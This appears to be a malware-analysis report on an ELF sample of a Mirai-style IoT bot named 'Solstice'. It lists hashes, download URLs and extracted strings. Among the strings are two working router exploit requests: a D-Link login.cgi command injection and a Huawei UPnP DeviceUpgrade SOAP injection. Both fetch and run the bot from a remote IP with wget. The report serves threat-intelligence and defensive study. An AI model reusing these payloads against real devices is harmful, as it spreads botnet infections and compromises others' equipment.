Sample details: 1f4f2a3481c433d449ad85a7ab3b26f1

Hashes
MD5: 1f4f2a3481c433d449ad85a7ab3b26f1
SHA1: e37a22473c81b94cd29b97936aea781e79dd2a5e
SHA256: d9178e440507ccd8beaf61e849960da40a307ea808190eb64b12ea08887937f9
SSDEEP: 1536:gWC2LD9iJgYNqUX4pB1JJOLlyKRpK8Ena80+L:gT2bVUX4pHJJkkB84P
Details
File Type: ELF
Yara Hits
Source URLs
http://185.101.105.162/bins/Solstice.m68k
http://185.101.105.162:80/bins/Solstice.m68k
http://185.101.105.163/bins/Solstice.m68k
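Strings (printable strings extracted from the sample; the HTTP requests below are text embedded in the binary, not captured traffic)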
		N^NuNV
N^NuNV
N^NuNV
N^NuNV
 OHWHQHy
?>./-t$/-|
/A-THo-TB
 7- ,D
B7	 (CHo(CN
Ho-hHx
dHo-tN
/@-dHo-dHo-`Hx
/BQxHoQxB
HoPpHoP
XZHw	 (la
Hw	 (xa
fHo(|a
XZHw	 (
Hw	 (xa
Hw	 (xa
XZHw	 (
 Ho(ha
Hw	 (pa
Hw	 (|a
 Ho(ha
Hw	 (pa
THo(ta
XZHw	 (|a
$Ho(ha
Hw	 (pa
lHo(la
Hw	 (ta
Hw	 (la
Hw	 (|a
$Ho(ha
Hw	 (pa
Hw	 (|N
Hw	 (lN
XZHw	 (lN
Hw) (xHx
Hw	 (lN
IsHw	 (pN
Hw	 (pa
I|Hw	 (|a
Hw	 (pa
Hw	 (pM
THw	 (pN
gTHo(hN
fFth D 
fFth C 
N^NuNV
N^NuNV
yp$C$.
4N^Nu#
N^NuNV
n&NBca
o2$	"D(
: G1|	
( SHx@
N^Nu o
NuNq o
b(p7 B
$NuNuNV
p7N@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
p@N@-@
N^NuNV
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
pUN@-@
N^NuNV
N^NuNV
pBN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNuNV
 @N^NuNuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
HN^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
RN^NuNV
NqNuNV
"	pfN@-@
N^NuNuNV
N^NuNV
N^NuNuNV
"	plN@-@
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
 @N^NuNuNV
p+N@-@
N^NuNuNV
LN^NuNV
DN^NuNV
N^NuNV
N^NuNV
 @N^NuNuNV
N^NuNuNV
N^NuNV
NqNuNV
N^NuNV
p-N@-@
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
PN^NuPOST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
fgtf/wavmeh'
iemjpemjav
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
?/dev/null
.shstrtab
.rodata
.ctors
.dtors